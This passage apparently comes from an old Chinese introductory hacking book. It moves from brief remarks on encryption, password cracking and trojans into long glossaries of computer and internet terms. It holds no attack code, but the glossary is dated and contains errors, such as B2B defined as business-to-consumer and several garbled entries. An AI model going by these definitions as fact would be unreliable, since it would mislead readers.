在“协议”的讲解中,我提到了“由于网络设计的基层存在问题……”,简单的说这一问题是允许所有上网者参与信息共享,因而对某些商业、个人隐私在网络上的传送,就会暴露在众目睽睽之下,我们的信用卡、个人电子邮件等都可以通过监听或者截获的方式被他人的到,如何才能让这些信息安全呢?读者也许想到了“二战中”的间谍战:参战国家在使用电报的时候,都对代码进行了加密处理,只有知道了“密码薄”的接收者,才可以进行译码工作。正是这种古老的加密方式,在现代化的网络上也依然存在它旺盛的生命力,通过加密处理的信息在网络上传送,无论谁拿到了这份文件,只要没有“密码薄”仍然是白费力气的。 网络上最长使用的是设置个人密码、使用DES加密锁,这两种加密方式分别可以完成用户登陆系统、网站、电子邮件信箱和保护信息包的工作,而黑客所要进行的工作,就是通过漏洞、暴力猜测、加密算法反向应用等方式获得加密档案的明文,有人把“魔高一尺、道高一仗”用在这里,的确是在恰当不过了!网络上的加密方法和需要验证密码的系统层出不穷,黑客也在寻找破解这些系统的种种办法。 可以说,“漏洞”和“解密”是两个完全不同的黑客领域,对于不同的学习者对他们的偏好,将会直接影响到今后将会成为的黑客类型,因而在二者之间的选择,应根据个人喜好进行,本书将会侧重学习“漏洞”方面的知识。 七、特洛伊木马: 特洛伊木马是一个程序,这个程序可以做程序设计者有意设计的未出现过的事情。但是对于特洛伊木马所做的操作,不论是否用户了解,都是不被赞同的。根据某些人的认识,病毒是特洛伊木马的一个特例,即:能够传播到其他的程序当中(也就是将这些程序也变成特洛伊木马)。根据另外的人的理解,不是有意造成任何损坏的病毒不是特洛伊木马。最终,不论如何定义,许多人仅仅用“特洛伊木马”来形容不能复制的带有恶意的程序,以便将特洛伊木马与病毒区分开 第9章 计算机英语名词解释 1、网络英语 Internet: 为International Net的简写,因特网,又称国际互联网。它最早产生于美国国防部的高级研究规划署,那是1969年的事了,最初的目的也只是远程计算机的数据共享,后来发展成将世界各地的计算机及计算机网络相互连接起来,形成了一个无边无际的超级大网。Internet的主要服务项目有:电子邮件(E-mail),远程登录(Telnet),查询服务(Finger),文件传输(FTP),文档服务器(Archive),新闻论坛(Usenet),电子公告牌(BBS),新闻群组(News Group),全球网(World Wide Web,缩写为WWW,又称万维网)等。 BBS:Bulletin Board System,公告牌系统或电子公告板,又称Public Access Message System,公共访问信息系统。它是普通公告的电子版本,用户可以通过公告牌发布消息,任何用户都可以读取公告牌上的消息,也可以给某一特定的人或一组用户发送信息。公告牌系统被广泛地用于传播信息,咨询一个电子公告牌往往比使用交互信箱或公共邮政系统发送公告更加快捷、有效。 WWW: World Wide Web的缩写,全球网,又称万维网。它是一个基于超文本方式的信息检索工具,提供一种友好的信息查询接口,是目前最受欢迎同时也是最先进的Internet检索工具之一。 Remote Login: 远程登录(注册),它是在网络环境下实现资源共享的一种重要手段,采用这种方式,用户可连接到世界任何一台Internet主机。 HTTP: Hyper Text Transmission Protocol,超文本传输协议。 IP:IP国际互联网协议,即网际协议。 FTP:是 Transfer Protocol的缩写,即文件传输协议,用于在Internet上传输文件。FTP的任务是从一台计算机将文件传送到另一台计算机。人们通过FTP可以获得很多免费的实用软件。 Gopher: 读音/′guf/,英文意为“地鼠”;(美国南部穴居的)可食用的龟”。它是Internet中基于菜单驱动的信息查询软件,可将用户的请求自动转换成FTP(文件传输协议)或Telnet(用于远程终端连接的标准IP协议)命令,在菜单的引导下,用户可对Internet上远程信息系统进行访问。 Archive: 读音/′a:kaiv/,“档案;档案馆”之意。Internet中的文档服务器,可定期自动地访问众多的Internet FTP服务器,将这些服务器上的文件索引成一个可以检索的数据库。 WAIS:是Wide Area Information Service的简写,广域信息服务器。它使得Internet上巨大的数据资源变得易于检索,并且可以获得远程数据库的信息。 Luisitserv: 这是Internet上流行的用户之间交流信息的方式。 IRC:Internet Relay Chat,互联网接力聊天。这是一种多用户聊天设施,允许多个用户通过文字实时地与其它人聊天。 Hypertext: 超文本。本来用做表示所有超链接,也表示包含“链接”的文本。这是一种非线性的信息组织方法,文字、图形和其它数据做为单个元素都能够指向(链接)其它元素。 Hyperlink: 超链接。一种与其它文件的“链接”,文件中图片、按钮、“热词”或短语都可以做为超链接,当用户选择超链接之后,所连接的信息就会显示出来。 HTML: Hyper Text Markup Language,超文本标示语言。它是由欧洲粒子实验室一名想象力丰富的研究员Tim Bemers Lee发明的,是“WWW(全球网)世界”的通用语言。“WWW世界”的诸服务器与客户浏览器间,通过它互相沟通;信息资源也是由它描述而“表现”的,HTML可以 描述主页(Home Page)和静态的文本。全世界有几千万人在使用HTML语言,可以毫不夸张地说,没有HTML就没有“WWW世界”。 Hypermedia: 超媒体。一种以计算机为基础的利用文字、图形、动画、声音和视频传送和显示信息的方法。这些文字等超媒体的组成元素既可以与其它文件连接,又可以做为单个对象处理。 Navigator: 是美国网景(Netscape)公司出品的Internet浏览器软件之一。Navigator的英文意思是“航海者、海上探险者”,寓意人们可以使用该软件在Internet网络的海洋中航行、探险。Navigator不仅可以浏览万维网(WWW),还具有电子邮件(E-mail)、文件传输(FTP)、远程登录(Telnet)及新闻组(News Group)、信息浏览(Gopher)等多种功能。 IE:Internet Explorer,Explorer意为“探险者”。 2、著名的计算机语言 VF:也写作VFP,Visual FoxPro的缩写,Visual在英语中意为“可视的”,Fox意为“狐狸”,原指美国狐狸数据库软件公司,该公司已被微软公司收购。Pro为Progress的略写,意为“更进一层”。Visual FoxPro是由Microsoft在FoxPro的基础上推出的功能强大、可视化、面向对象的数据库编程语言,同时它也是一种强大的数据库管理系统。 VC:Visual C++,微软公司高级可视化计算机程序开发语言。C语言被人们称为近十年来对计算机程序设计最大的贡献之一。它有高级语言简单易用的特性,又可以完成汇编语言才能做的许多工作。因此,C语言特别适合用来编写各种复杂软件。如果说BASIC语言是初学者和业余爱好者的编程语言的话,那么C语言就是专业人员的编程语言了。 VB:Visual Basic的缩写,微软公司高级可视化计算机程序开发语言。BASIC是Beginner’s All-purpose Sybolic Instruction Code(初学者通用符号指令代码)的缩写,从BASIC开始相继推出了Quick BASIC、Ture BASIC等,目前最新的是Microsoft公司推出的Visual Basic。这是一种功能极强的面向对象的可视化程序设计语言。 Delphi:读音/′delfai/,特尔斐,古希腊城市名,被古希腊人当成世界的中心,因有阿波罗神殿而出名。在电脑英语中指美国宝兰(Borland)公司的一种可视化、面向对象、事件驱动的电脑编程语言。 Java:读音/′da:v/,《新英汉字典》译注为“爪哇岛(属印度尼西亚)、爪哇咖啡”。电脑英语指由美国太阳(Sun)公司推出的新型面向对象程序设计语言。Java集面向对象、平台无关性、稳固性、安全性、多线程等诸多特性于一体,增加了异常处理、网络编程等方面的功能,特别适合于Internet应用的开发,是实现“一个世界,一个网络”构想的关键。用Java编写的各类软件能真正做到“Write Once,Run anywhere(一次写成,到处运行)”,也就是说,相同的软件可在不同计算机上运行,无论是PC机、苹果机、UNIX计算机、还是顶置盒、PDA(个人数据助理)乃至智能元器件无一例外。 SQL:Structure Query Language,结构化查询语言。SQL是关系数据库管理系统中的一种简明扼要、面向集合的语言,它对一个或多个数据表进行查询,产生一个结果数据表。 3、常见的重要电脑英语及其缩写 PC:Personal Computer,个人计算机、个人电脑,又称微型计算机或微机。 NC: Network Computer,网络计算机。 MPC: Multimedia Personal Computer,多媒体个人电脑。 MMX: 是MultiMedia eXtensions(多媒体扩展)的缩写,是第六代CPU芯片的重要特点。MMX技术是在CPU中加入了特地为视频信号(Video Signal),音频信号(Audio Signal)以及图像处理(Graphical Manipulation)而设计的57条指令,因此,MMX CPU极大地提高了电脑的多媒体(如立体声、视频、三维动画等)处理功能。 Intel Pentium 166MHz MMXTM: Intel Pentium是英特尔(Intel)公司生产的“奔腾”CPU。意为“Registered”(注册商标)。166MHz指CPU时钟频率,MHz即Mega Hertz的缩写。MMXTM中的TM是“Trade Mark”的简写,意为“注册商标”。 OOP: Object Oriented Programming,面向对象的程序设计。所谓“对象”就是一个或一组数据以及处理这些数据的方法和过程的集合。面向对象的程序设计完全不同于传统的面向过程程序设计,它大大地降低了软件开发的难度,使编程就像搭积木一样简单,是当今电脑编程的一股势不可挡的潮流。 28VGA: 28是指彩色显示器上的黄光网点间距(点距),点距越小的显示器,图像就越细腻、越好,这是因为彩色屏幕上的每个像点都是由一组红、绿、蓝光汇聚而成的,由于在技术上三束光还不能100%地汇聚在一点上,因此会产生一种黄光网点的间隔,这种间隔越小,屏幕上显示的图像越清晰。VGA是Video Graphics Array(视频图形阵列)的缩写。 FAT:Allocation Table,文件分配表,它的作用是记录硬盘中有关文件如何被分散存储在不同扇区的信息。 EPA:Environmental Protection Agency的简称,美国环境保护署。EPA于1992年宣布了“能源之星”(Energy Star)计划,并得到了国际社会的积极响应。只要启动电脑,过不了几秒钟就能见到屏幕上出现“能源之星”的标志。能源之星的目标是当电脑系统的各个部件不活动时自动进入低功耗状态,当部件的能动性恢复(即当键盘、鼠标等被使用)时,电脑系统自动回到完全清醒的状态。对于符合能源之星规范的产品,EPA将发给能源之星标志“EPA POLLUTION PREVENTER”,意为“美国环境保护署认可的防污染的节能产品”。 IC卡:Intelligent Card,智能卡。 ATX:一种新的电脑机箱、主板、电源的结构规范。 IDE:集成电路设备或智能磁盘设备。 DLL:Dynamic Link Library,动态链接库。 KB:Kilo Byte,KB表示千字节。K=Kilo,构词成分,表示“千;千米;公斤;公里”。B=Byte,意为“字节”,是电脑中最小存贮单位(一个字节可以存贮一个英文字母,每两个字节可以存放一个汉字)。 MB:Mega Byte,MB表示兆字节。M=Mega,构词成分,表示“兆;百万”。 GB:Giga Byte,GB表示千兆字节。G=Giga,构词成分,表示千兆;十亿”。 CAI:Computer-Asisted Instruction或Computer-Aided Instruction,计算机辅助教学。它将是二十一世纪最重要、最受欢迎的教学手段。 CAD:Computer-Aided Design,计算机辅助设计。 ISO:International Standard Organization,国际标准化组织。ISO于1987年推出有关质量管理和质量保证的ISO 9000系列国际标准,于1994年又发布了经过修订的标准。其中,构成ISO 9000系列标准的主要标准分别是:1.ISO 9000-1:1994《质量管理和质量保证标准—第一部分:选择和使用指南》。2.ISO 9001:1994《质量体系—设计、开发、生产、安装和服务的质量保证模式》。3.ISO 9002:1994《质量体系—最终检验和试验的质量保证模式》。 3DS或3D Studio: Three Dimension Studio,三维摄影室。是美国Autodesk公司推出的一套多功能三维动画软件,集实体造型、静态着色和动画创作于一体,极大地普及了三维造型技术。它能够与AutoCAD进行图形信息交换,利用扫描仪输入图形,通过VGA与电视转换接口将动画输出至电视或录像带。 VR:Virtual Reality,虚拟现实,又称投入3D,由空军模拟飞行装置演变而来,基本上是利用左、右视觉空间交替变换显示图像的原理产生立体效果,实际上已超出图像处理的范畴,是综合光、声、图像的计算机生成环境,人们能够像在实际生活中那样对虚拟环境中的对象进行交互式操作,虚拟现实应用前景极为广阔。 OCR:Optical Character Recognition(光学字符识别)的缩写,是指将文字材料通过扫描仪输入作为计算机图像文件,通过软件识别为中文或英文内码,然后进行文字处理。由于手写体的随意性太大,目前OCR主要限于印刷文字的识别。目前代表中文OCR识别准确率最高水平的是清华文通公司出品的TH-OCR NT for Windows。 SCSI:Small Computer System Interface,小型计算机系统接口,它是为解决众多的外部设备与计算机之间的连接问题而出现的。 OEM:Original Equipment Manufacturer,原始设备制造商。 Microsoft OEM: 微软OEM产品。它是指预安装在微机上的软件操作系统,包括Windows98、Windows NT、WorkStation、Windows3.X、MS-DOS。 MIS:Management Information System,管理信息系统。它广泛地应用于各行各业,国内最有名的管理信息系统有“王特MIS”、“雅奇MIS”、“Quick MIS”。 PNP:Plug and Play,即插即用,它是Window98的一个重要技术特性。所谓即插即用是指将符合PNP标准的PC插卡等外围设备安装到电脑时,操作系统自动设定系统结构的技术。这就是说,当用户安装新的硬件时,不必再设置任何跳线器开关,也不必用软件配置中断请求(IRQ)、内存地址或直接存储器存取(DMA)通道,Windows98会向应用程序通知硬件设备的新变化,并会自动协调IRQ、内存地址和DMA通道之间的冲突。 OLE:Object Linking and Embedding,对象连接与嵌入,简称OLE技术。OLE不仅是桌面应用程序集成,而且还定义和实现了一种允许应用程序作为软件“对象”(数据集合和操作数据的函数)彼此进行“连接”的机制,这种连接机制和协议称为部件对象模型(Component Object Model),简称COM。OLE可以用来创建复合文档,复合文档包含了创建于不同源应用程序,有着不同类型的数据,因此它可以把文字、声音、图像、表格等组合在一起。 MIDI:Musical Instrument Digital Interface,乐器数字接口。它是多媒体的基本术语之一,MIDI文件是用电子乐器如:电子琴、吉它、萨克斯等演奏并录制下来的,它能在大多数的多媒体计算机声音卡上播放,即使不去创建自己的MIDI文件,也可以使用现有的MIDI文件,作为多媒体演示的背景音乐。MIDI文件储存的只是对声音的描述,依靠声音卡的合成器(FM或者波形表)来产生人们想听的真实声音。 MPEG:是Motion Picture Experts Group的缩写,意即“运动图像专家组”,它是多媒体计算机中的一种活动图像及其伴音的压缩编码标准,即人们通常所说的MPEG标准。它包括三部分:MPEG音频、MPEG视频、和MPEG系统。 第10章 名词解释 ◎ 网络快车ADSL ADSL(Asymetric Digital Subscriber Loop)技术即非对称数字用户环路技术,就是利用现有的一对电话铜线,为用户提供上、下行非对称的传输速率(带宽),上行(从用户到网络)为低速的传输,可达640Kbps;下行(从网络到用户)为高速传输,可达7Mbps。它最初主要是针对视频点播业务开发的,随着技术的发展,逐步成为了一种较方便的宽带接入技术,为电信部门所重视。 这种宽带接入技术具有以下特点: 1.可直接利用现有用户电话线,无须另铺电缆,节省投资; 2.渗入能力强,接入快,适合于集中与分散的用户; 3.能为用户提供上、下行不对称的传输带宽; 4.采用点一点的拓扑结构,用户可独享高带宽; 5.可广泛用于视频业务及高速INTERNET等数据的接入。 目前,由于普通的INTERNET用户接入网络的方式采用拨号MODEM的方式,因此,INTERNET用户的剧增可能会造成网络的拥塞(国外已经出现了这种情况),而使用ADSL可以加以避免。 ◎ ASP ASP 全称为 Active Server Pages(动态服务器主页),它一种应用程序环境,可以利用 VBscript 或 Java Script 语言来设计,主要用于网络数据库的查询与管理。其工作原理是当浏览者发出浏览请求的时候,服务器会自动将 ASP 的程序码,解释为标准 HTML 格式的网页内容,再送到浏览者浏览器上显示出来。我们也可以将 ASP 理解为一种特殊的 CGI。 ◎ 安全认证(CA) 在网上交易中,客户、商家、银行不可能直接见面。为了确认交易各方的身份以及保证交易的不可否认,需要有一份数字证书来进行验证,这就是电子安全证书。电子安全证书由认证中心来发放。 安全证书是保证个人身份或Web站点安全的声明。安全证书是对个人身份的一种保证。可以指定自己的信息,如用户名和密码。在用户通过Internet向那些需要证书以证明自己身份的Web站点发送个人信息时使用这些信息。“Web安全证书”表明特定的Web站点是否安全和真实。这可以确保其他任何Web站点都无法冒充源安全站点的身份。 ◎ B2B 电子商务按交易对象分类中的一种,即表示商业机构对消费者的电子商务。这种形式的电子商务是在企业与企业之间进行的。一般以信息发布与撮合为主,主要是建立商家之间的桥梁。著名的阿里巴巴(www.Alibaba.com)就是属于这种站点。例如:某商店利用计算机网络想某电器工厂订购电风扇,并且通过网络进行签定协议、付款商务活动。这就是简单的B2B电子商务形式。是企业在激烈的市场竞争面前,改善自我竞争条件的主要方法。 ◎ B2C 电子商务按交易对象分类中的一种,即表示商业机构对消费者的电子商务。这种形式的电子商务一般以网络零售业为主,主要借助于Internet开展在线销售活动。例如经营各种书籍、鲜花、计算机、通信用品等商品。著名的亚马逊(www.amazon.com)和国内著名的一号网(www.1hao.com)就是属于这种站点。 ◎ BBS BBS即电子公告牌。是互联网上早期比较流行的一种信息交换方式。用户一般在登记以后就可以发布信息,也可以在在上面查询自己比较感兴趣的信息。BBS一般分为Unix的字符方式和WWW图形方式。大多数的BBS是采用Unix字符方式的。登录到这种BBS系统一般使用远程登录方式(即使用Telnet来连接BBS系统的主机)。国内著名的BBS系统如:“蓝天BBS”(bbs.gznet.com)。 ◎ 版主 版主指网站的主页或网站中某个栏目的维护者,有时候被戏称为“斑竹”。通常版主主要负责相关主页的维护。包括信息的更新管理、回答访问者的问题等等。 ◎ CNNIC CNNIC即中国互联网络信息中心。是成立于1997年6月3日的非盈利管理与服务机构,行使国家互联网络信息中心的职责。中国科学院计算机网络信息中心承担CNNIC的运行和管理工作,CNNIC在业务上接受信息产业部领导,在行政上接受中国科学院领导。CNNIC工作委员会,对CNNIC的建设、运行和管理进行监督评定。 CNNIC的主要任务有:注册服务、目录数据库服务、信息服务、网站访客流量认证、认证培训等。 此外,CNNIC还承担与Internet有关的国家科研项目以及向社会提供Internet技术咨询和服务工作。CNNIC作为国家级的互联网络信息中心,代表我国各互联网络单位与国际互联网络信息中心(InterNIC)、亚太互联网络信息中心(APNIC),及其它的互联网络信息中心进行业务联系。 ◎ CEO CEO是Chief Executive Officer的缩写,现代公司管理制度中的首席执行官。 ◎ CIO CIO 是 Chief Information Officer 的缩写,现代公司管理制度中首席信息总监。 ◎ CTO CTO是Chief Technology Officer的缩写,现代公司管理制度中的首席技术总监。 ◎ COO COO 是 Chief Operation Officer的缩写,现代公司管理制度中的首席营运总监。 ◎ CFO CFO是Chief Financial Officer的缩写,现代公司管理制度中的首席财政总监。 ◎ CGO CGO是Chief Government Officer的缩写,现代公司管理制度中的首席沟通总监。 ◎ 插件 插件,即英文的Plug-in,是一种程序。浏览器一般能够直接调用插件程序。插件安装后就成为浏览器的一部分,可以处理特定的文件。插件的使用,增强了浏览器处理不同Web文件的能力。 ◎ DDN DDN(Digital Data Network)也称数字数据网。DDN是骨干数据网最早的形式之一,它是一种纯物理层、半永久性的网络,也就是说它只负责把数据从A点传送到B点,而不管数据被封装成何种形式。 DDN的特点是传输速率高、有保障、时延较小。用户的接入方式一般是专线,进网速率为N*64k,最高达2M,用户可自由选择DDN的业务有: 1、提供"点到多点"的电路连接,适合于用户广播发送各种新闻、天气、证券等信息,也适用于集中监控、信用卡验证、销售终端(POS)验证、预订系统等业务; 2、提供"多点到多点"的电路连接,适合于用户的网络互连; 3、在一条专线上给用户同时提供语音和传真业务,能进行标准的语音压缩功能。 ◎ 电子商务 电子商务(EC,也就是E-Commerce的缩写),关于电子商务的定义世人众说纷纭,从不同的角度出发有不同的定义。可以理解为以Internet为依托,借助一定的信用支付手段,在网络上进行产品的购销、费用支付及其他商务活动等。按交易对象不同进行分类,可以分为:BtoB(常简称为B2B,商业机构对商业机构的电子商务)、BtoC(常简称为B2C,商业机构对消费者的电子商务)、CtoC(常简称为C2C,即消费者对消费者的电子商务)、CtoB(常简称为C2B,即消费者对商家的电子商务)等。国内著名电子商务站点如:www.Alibaba.com、www.8848.net、www.1hao.com等。 ◎ E-mail E-mail即电子邮件。戏称“伊妹儿”。互联网上的一种信息传递方式。顾名思义,就象生活中的邮局传递方式一样,发送邮件要填写地址,这里也一样要有E-mail地址,形式大都为:yourname@xxx.xxx,例如:yourname@yahoo.com。(其中“@”表示“在”的意思,读“at”,可理解为Internet上的某台邮件服务器上的一个用户地址)。你可以将自己的文本信息甚至图象、声音信息通过邮件软件发送出去,将你的信件直接发送给你想发送的人。 E-mail作为Internet的重要资源,和传统的信件相比有许多无可比拟的优越性: 1、 广阔的发送范围; 2、 瞬间的发送和接收速度; 3、 低廉的经济费用等。 随着Internet的发展,国内目前已经有大量的免费E-mail服务提供商,如www.163.net等。 ◎ FTP FTP是File Transfer Protocol的缩写。即文本传输协议。是Internet上使用非常广泛的一种通讯协议。他是有支持Internet文件传输的各种规则所组成的集合。这些规则使Internet用户可以把文件从一个主机传送到另一个主机上。FTP通常也表示用户执行这个协议所使用的应用程序,如:CutFTP等。用户使用的方法很简单,启动FTP软件先与远程主机建立连接,然后想远程发出指令即可。 ◎ FAQ FAQ是Frequently Asked Questions 的缩写。表示经常被问到的问题及其解答。在互联网上发布FAQ是使新用户不再提出相同的问题。 ◎ 防火墙 防火墙(Firewall)就好象是内部网络与外部网络连接的安全桥梁。通过防火墙可以拦截并过滤信息,只让符合安全标准的信息通过。这样可以最大限度地隔离互联网上的破坏者和阻止黑客的入侵。 ◎ 公司主页 在茫茫网海里,公司可以建立一个随时可供用户访问浏览的页面。这个页面就叫做主页(Homepage)。可以将公司产品信息或其他信息以文字、图形、图象、动画、声音和视频等形式展现在主页上。用户通过主页可以访问包含更多信息的其他页(Pages)。主页通常是用户使用Web浏览器程序访问Internet上任何Web主机所看到的第一个页面。在很多场合中,Homepage与Pages并不区分,或者都称为Homepages,或称为Pages。著名公司主页地址如:www.microsoft.com、www.ibm.com等。 ◎ 个人主页 象公司一样,个人也可以建立一个随时可供用户访问浏览的页面。这个页面就叫做主页(Homepage)。个人可以将自己的爱好、特长等通过文字、图形、图象、动画、声音和视频等富于个性化的形式展现在自己的主页上,随时供网友访问浏览。以达到与网友交流、展现自我的效果。用户通过主页可以访问包含更多信息的其他页(Pages)。主页通常是用户使用Web浏览器程序访问Internet上任何Web主机所看到的第一个页面。在很多场合中,Homepage与Pages并不区分,或者都称为Homepages,或称为Pages。目前个人主页空间提供商多数以免费的形式提供,如:Supercool.163.net。著名的个人主页如:carboy.163.net。 ◎ HTTP HTTP(Hypertext Transfer Protocol),即超文本传输协议。是WWW浏览器和WWW服务器之间的应用层通讯协议。HTTP协议是基于TCP/IP之上的协议,它不仅保证正确传输超文本文档,还确定传输文档中的哪一部分,以及哪一部分内容首先显示(如文本先与图形)等等。 ◎ 黑客 黑客是英文Hacker的音译。也称“骇客”。原意指热衷于深入了解计算机系统或网络内部工作原理的那些程序人员。后来被用于指那些利用其掌握的网络技术在网上进行破坏或制造恶作剧的人。 ◎ Internet Internet中文名也称“因特网”或“国际互联网”。是70年代有美国军方的ARPA发展而来的。是一个由各种不同类型和规模的独立运行和管理的计算机网络组成的全球范围的计算机网络。网络间可以畅通无阻地交换信息。 组成Internet的计算机网络包括局域网(LAN)、地域网(MAN)、以及大规模的广域网(WAN)等。这些网络通过普通电话线、高速率专用线路、卫星、微波和光缆等通讯线路把不同国家的大学、公司、科研机构以及军事和政府等组织的网络连接起来。 Internet为人们提供了巨大的不断增长的信息资源和服务工具宝库,用户可以利用其提供的各种工具去获取其提供的巨大信息资源和先进的服务等。同样可以通过Internet将个人或企业部门的信息发布出去,随时供其他用户访问浏览。 ◎ ISP ISP(Internet Service Provider)是Internet服务提供商。用户只有通过ISP才能接入Internet,并享受各种服务。ISP作为提供接入服务的中介,租用国际信道和大量的当地电话线,购置一系列计算机设备,通过集中使用,分散压力的方式,向本地用户提供接入服务。如果把互联网比作一条信息高速公路,那么ISP就是把你带到这条公路上的人。 ◎ ICP ICP(Internet Content Provider)即Internet上的信息内容提供商。ICP在网上主要以信息服务为主,利用大量的或独具特色的信息资源来吸引人们上网。如果把互联网比作一条信息高速公路,那么这条公路上有没有让你着迷的风景就是由ICP决定的了。 ◎ ICQ ICQ为英文“I seek you”的英文音译缩写。可以利用它在网上找人。所以也称“网络传呼机”,和生活中的寻呼机一样,每个用户也同样拥有唯一的属于自己的号码。使用时要安装相应的ICQ软件。想了解更多,请访问www.icq.com。 ◎ IP地址 IP地址是Internet上主机地址的数字形式,与主机的域名地址是一一对应的。IP地址是一个32位的二进制数,通常写成被句点分开的四个十进制树的形式,例如:202.112.223.12等。IP地址通常分为A、B、C三类,这种分类与IP地址中字节的使用方法相关。在实际应用中,可以根据具体情况选择使用IP地址的类型格式。A、B、C三类地址所能表示的范围分别是: A类:0.0.0.0-127.255.255.255 B类:128.0.0.0-191.255.255.255 C类:192.0.0.0-223.255.255.255 IP地址和域名地址不能随意分配,否则将会导致无法估计的混乱状态,这就象我们生活中的通信地址一样。在需要IP地址或域名地址时,用户必须向国际网络信息中心NIC提出申请。申请批准后凡能够使用Internet域名地址的地方都可以使用IP地址。 ◎ IP电话 IP电话又叫VoIP(Voice over Internet protocol)电话,也就是我们常提到的“网络电话”。指通过Internet传输交互语音的应用技术。它可以从数量上减少长途电话,尤其是国际长途电话费用。这种技术最早以色列一家电子公司VocalTec推出。目前这种技术正在被大力的推广应用,由于收费较为低廉,因而受到用户的广泛欢迎。 ◎ 163 在互联网上网友们常会听到“163”这组数字,而且有三个。但它们的相同只是巧合而已: A、拨号上网的用户拨“163”,这是中国电信为用户接入互联网而特设的号码,用户只要到电信局办理完入网手续,然后用Modem拨打“163”,就可以接入互联网。 B、网易公司的域名:www.163.com,这是一家著名的网络公司。是一家主要从事于互联网信息技术业务的企业。 C、163电子邮局的域名:www.163.net,是著名的全国第一家中文免费邮件服务提供商。目前为新飞网公司所有。 ◎ ISOC ISOC——Internet Society ,国际互联网学会。一个国际性非盈利组织,总部设于弗吉尼亚的雷斯顿,寻求保持和拓宽国际互联网的可用性。 该机构创建于 1992 年,由选择产生的理事会管理。成员包括个人和组织 ( 包括服务提供商、产品提供商、国际互联网企业经营者、教育机构、计算机专业机构、国际条约组织,以及政府机构 ) 。该机构主办年度会议,并有大量出版程序。以国际互联网技术操作和开发为先导,国际互联网学会协调体系结构委员会 (IAB) 、国际互联网工程专门工作组 (IETF) 、国际互联网工程指导小组 (IESG) 、国际互联网工程与规划小组 (IEPG) 、国际互联网号码分配管理委员会 (IANA) 以及国际互联网注册管理委员会。 ◎ Intranet 一个设计用来在公司和组织内处理信息的网络。是Internet 技术在企业内部或封闭的用户群 内的应用,是一个公司所特有的,不一定与Internet有物理上的连接关系。它的用途包括提供诸如文档分发、软件发布、访问数据库和培训等服务。之所以命名为企业内部互联网是因为它使用了诸如 Web 页(网页)、Web 浏览器、FTP 站点、电子邮件、新闻组和邮件列表等与 Internet 相关的应用程序,但它的作用范围仅限定于公司或组织内部。 ◎ 宽带网 也有称作 wideband transmission。一种局域网络,信号在不同的入境和出境频道上以射电频率信号形式进行传输。宽带网络中的节点之间用同轴电缆或光纤缆连接,可以通过多个传输频道同时传送数据、语音以及视频信号,频道之间用频率区分。宽带网适用于高速操作(20兆字节或更快),但是比基带网络昂贵而且安装困难。 ◎ 浏览器 浏览器“(Browser)”是一个被形象化了的名词,它是一种用来访问WWW服务的一种客户端程序。也可以理解为用户上网后用来查看主页的软件。目前WWW环境中使用最多的主流浏览器有两种:一个是美国Microsoft公司的Internet Explorer(IE),另一个是美国Netscape公司的Navigator。其他的还有Opera等等。 ◎ 离线 离线(Offine)也可以称脱机、脱线,和在线相对。一般有三种含义: 1、当前未与网络连通; 2、对网络的请求没有响应; 3、聊天室里某人不再参加讨论。 ◎ 聊天室 聊天室是互联网上的某台计算机作为服务器,所有登录或连接到这台计算机上的用户可以彼此间交换信息。达到你发一句,我立即回答一句的效果,故形象化称之为“聊天室”。 目前的聊天室有两种方式:一种是用户通过安装特定的聊天软件来实现和其他人进行文字交流。还有一种基于WWW方式的,一般作为网络的一个栏目,用户不需要安装额外的软件,只需通过浏览器就可以进行聊天。 ◎ MODEM MODEM就是调制解调器。是调制器和解调器的合称。网友们通常戏称为“猫”。它是拨号上网的必备设备。通过Modem将计算机的数字信息变成音频信息才得以在电话线上传播。 Modem一般分内置和外置两种。内置式插入计算机内不占用桌面空间,使用电脑内部的电源,价格一般比外置式便宜。外置式安装简易,无需打开机箱,也无需占用电脑中的扩展槽。它有几个指示灯,能够随时报告Modem正在进行的工作。 ◎ POP3 POP3是Post Office Protocol version3的缩写。即邮局协议版本3。一般通过POP3协议标准,为没有运行邮件系统的主机提供邮件的收发服务。 ◎ SMTP SMTP是Simple Mail Transmission Protocol的缩写。即简单邮件传送协议。在国际互联网上一般通过SMTP来发送电子邮件。 ◎ 搜索引擎 搜索引擎是WWW环境中的信息检索系统。它包括目录服务和关键字检索两种服务方式。目录服务可以帮助用户按一定的结构条理清晰的找到自己感兴趣的内容。关键字检索服务可以查找包含一个或多个特定关键字或词组的WWW站点。目前著名的搜索引擎服务商如:www.yahoo.com、www.sohu.com等。 ◎ 上传和下载 上传和下载是指在互联网上文件传输的专门术语。当一个网友把自己计算机上的文件拷贝到远程计算机上的时候,我们就之为Upload,也就是上传;相反,当一个网友从某台远程计算机上拷贝文件到自己计算机上时,我们称为Downloan文件,或简称Down文件,也就是下载。 ◎ SET协议 SET协议(Secure Electronic Transaction,安全电子交易)是由VISA和MasterCard两大信用卡公司于1997年5月联合推出的规范。SET主要是为了解决用户、商家和银行之间通过信用卡支付的交易而设计的,以保证支付信息的机密、支付过程的完整、商户及持卡人的合法身份、以及可操作性。SET中的核心技术主要有公开密匙加密、电子数字签名、电子信封、电子安全证书等。 SET协议比SSL协议复杂,因为前者不仅加密两个端点间的单个会话,它还可以加密和认定三个方间的多个信息。 ◎ SSL协议 SSL协议(Secure Socket Layer,安全套接层)是由网景(Netscape)公司推出的一种安全通信协议,它能够对信用卡和个人信息提供较强的保护。 SSL是对计算机之间整个会话进行加密的协议。在SSL中,采用了公开密钥和私有密钥两种加密方法。 ◎ SQL SQL是一种结构化数据库查询语言,其发音为“sequel”或“S-Q-L”。尽管MICROSOFT以其特有的方式加入了所有权声明,但它在大多数据库应用中近乎成为一种标准。简言之,它是一种使用你选择的标准从数据库记录中选择某些记录的方法。 ◎ WAP WAP是Wireless Applecation Protocol即无线应用协议的缩写。相当于无线上网的TCP/IP。具有WAP功能的终端设备,如WAP手机,通过手机内置的微型浏览器,经由数字无线网络,如GSM网络,登陆互连网。 WAP内容用WML编写,在手机上显示的内容以文字为主,没有很多的图象和色彩。 WAP的最大优点是移动性,用手机你可以在任何时候,任何地点上网,可以进行阅读新闻、收发E-mail等。 另外,通过网络可以知道用户的所在位置,也就可能把与位置相关的信息提供给用户,如交通信息,附近的医院,饭店,酒吧,电影院,提款机等信息。 目前可以上网的手机有Nokia7110、Siemens3568i、Motorola a6188等机型。 ◎ WWW WWW有人称做万维网或环球网,是World Wide Web的缩写形式。简称Web。是基于超文本的文件信息服务系统,用户可以通过浏览器搜索和浏览文字、图片、声音和视频等信息。WWW的服务特点在于高度的集成性,它能把各种类型的信息(如:文字、图片、声音和视频等)和服务(如:News FTP Telnet Gopher 